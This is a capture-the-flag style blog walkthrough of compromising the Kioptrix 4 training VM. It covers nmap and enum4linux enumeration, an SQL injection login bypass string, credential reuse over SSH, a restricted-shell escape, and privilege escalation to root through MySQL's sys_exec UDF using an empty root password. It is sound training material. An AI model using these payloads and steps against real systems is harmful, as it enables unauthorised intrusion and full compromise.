Rooting Kioptrix 4 Walkthrough

Overview

Kioptrix 4 is B2R VM designed for students to practice vulnerability analysis and exploitation. Objective is to root this virtual machine by exploiting possible vulnerabilities leading to full system compromise

Vulnerabilities Exploited:

  • SQL Injection in website admin panel
  • Website user password reused for secure shell
  • Website connected with mysql database with root credentials
  • System procedure availble for execution through lib_mysqludf_sys.so

Lab Setup:

  • VMWare workstation for Virtual Machines
  • Kali Linux VM in Bridge mode
  • Kioptrix 4 in Bridge mode

Tools Used:

  • Kali Linux VM
  • netdiscover
  • nmap

Reconnaissance/Scanning

#netdiscover

_____________________________________________________________________________
IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.8.100   84:3a:4b:5c:f5:54      1      60  Intel Corporate
192.168.8.108   00:0c:29:89:0d:50      1      60  VMware, Inc.
192.168.8.1     14:a5:1a:c3:5a:cc     14     840  HUAWEI TECHNOLOGIES CO.,LTD
 

Target VM IP Address: 192.168.8.108

Lets Scan target box with nmap to find open ports, and services listening on those ports.

root@kali:~# nmap -p- -A 192.168.8.108
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-30 07:57 EDT
Nmap scan report for 192.168.8.108
Host is up (0.00035s latency).
Not shown: 39528 closed ports, 26003 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:89:0D:50 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Host script results:
|_clock-skew: mean: 6h59m58s, deviation: 2h49m43s, median: 4h59m57s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name:
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2018-05-30T12:58:29-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
 
TRACEROUTE
HOP RTT     ADDRESS
1   0.35 ms 192.168.8.108
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.70 seconds
 

Nmap Findings:

  • Target box is linux machine
  • Secure shell on port 22
  • Website on port 80
  • and Samba server at 445

With sql injection we bypassed authentication, but there is no page for user account “admin”

admin:garbag’ or 1=1 — –

So, we need to enumerate user accounts first. Lets use enum4linux.

root@kali:~# enum4linux 192.168.8.108

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed May 30 08:12:46 2018
 
==========================
|    Target Information    |
==========================
Target ........... 192.168.8.108
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
 
 
=====================================================
|    Enumerating Workgroup/Domain on 192.168.8.108    |
=====================================================
[+] Got domain/workgroup name: WORKGROUP
 
=============================================
|    Nbtstat Information for 192.168.8.108    |
=============================================
Looking up status of 192.168.8.108
KIOPTRIX4       <00> -         B <ACTIVE>  Workstation Service
KIOPTRIX4       <03> -         B <ACTIVE>  Messenger Service
KIOPTRIX4       <20> -         B <ACTIVE>  File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
 
MAC Address = 00-00-00-00-00-00
 
======================================
|    Session Check on 192.168.8.108    |
======================================
[+] Server 192.168.8.108 allows sessions using username '', password ''
 
============================================
|    Getting domain SID for 192.168.8.108    |
============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
 
=======================================
|    OS information on 192.168.8.108    |
=======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.8.108 from smbclient:
[+] Got OS info for 192.168.8.108 from srvinfo:
KIOPTRIX4      Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)
platform_id     :  500
os version      :    4.9
server type     :    0x809a03
 
==============================
|    Users on 192.168.8.108    |
==============================
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody   Name: nobody   Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert    Name: ,,,             Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root        Name: root         Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john        Name: ,,,             Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret            Name: loneferret,,,          Desc: (null)
 
user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]
...

Found 3 users, john, robert, loneferret.

Exploitation

Lets bypass authentication with username john.

john:garbag’ or 1=1 — –

Lets reuse john’s credentials over ssh.

root@kali:~# ssh john@192.168.8.108
The authenticity of host '192.168.8.108 (192.168.8.108)' can't be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.8.108' (RSA) to the list of known hosts.
john@192.168.8.108's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ python -c "import pty; pty.spawn('/bin/bash');"
*** forbidden syntax -> "python -c "import pty; pty.spawn('/bin/bash');""
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.
john:~$
 

We are presented with restricted shell.
Lets break shell restrictions with echo os.system(“/bin/bash”)

john:~$ echo os.system("/bin/bash")
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=115(admin),1001(john)
john@Kioptrix4:~$
 

Privilege Escalation

So, our next step is to root linux machine. Lets search for UDF library. UDF library is used to interact with system from with in mysql environment.

john@Kioptrix4:~$ whereis lib_mysqludf_sys.so
lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so
john@Kioptrix4:~$

Database credentials found in checklogin.php

john@Kioptrix4:/var/www$ cat checklogin.php
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
 
// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");
 
// Define $myusername and $mypassword
$myusername=$_POST['myusername'];
$mypassword=$_POST['mypassword'];
 
// To protect MySQL injection (more detail about MySQL injection)
$myusername = stripslashes($myusername);
//$mypassword = stripslashes($mypassword);
$myusername = mysql_real_escape_string($myusername);
//$mypassword = mysql_real_escape_string($mypassword);
 
//$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
$result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'");
//$result=mysql_query($sql);
 
// Mysql_num_row is counting table row
$count=mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 row
 
if($count!=0){
// Register $myusername, $mypassword and redirect to file "login_success.php"
session_register("myusername");
session_register("mypassword");
header("location:login_success.php?username=$myusername");
}
else {
echo "Wrong Username or Password";
print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>');
}
 
ob_end_flush();
?>
 

Database credentials are user:”root”, password:”” with empty password
Lets log into mysql and make john administrator/root

john@Kioptrix4:/var/www$ mysql -u root@localhost -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 28
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> select sys_exec('usermod -a -G admin john');
+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL                                 |
+--------------------------------------+
1 row in set (0.01 sec)
 
mysql> exit
Bye

Lets confirm root access.

john@Kioptrix4:/var/www$ sudo su
[sudo] password for john:
root@Kioptrix4:/var/www# whoami
root
root@Kioptrix4:/var/www# id
uid=0(root) gid=0(root) groups=0(root)

 

roooooooooootz:)

References

https://www.vulnhub.com/entry/kioptrix-level-13-4,25/

http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s